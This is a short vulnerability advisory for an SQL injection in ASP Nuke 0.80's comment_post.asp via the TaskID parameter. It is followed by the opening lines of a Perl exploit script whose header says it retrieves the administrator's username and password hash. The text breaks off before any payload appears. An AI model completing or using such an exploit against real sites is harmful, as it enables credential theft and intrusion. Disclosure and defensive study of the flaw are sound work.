SQL injection vulnerability in comment_post.asp in ASP Nuke 0.80 allows remote malicious users to execute arbitrary SQL statements via the TaskID parameter.
#!/usr/bin/perl -w
#
# SQL Injection Exploit for ASPNuke <= 080
# This exploit retrieve the username of the administrator of the board and his password crypted in SHA256
# Related advisory: wwwsecurityfocuscom/archive/1/403479/30/0/threaded
# Discovered and Coded by Alberto Trivero
use LWP::Simple;
print "\n\t======================== ...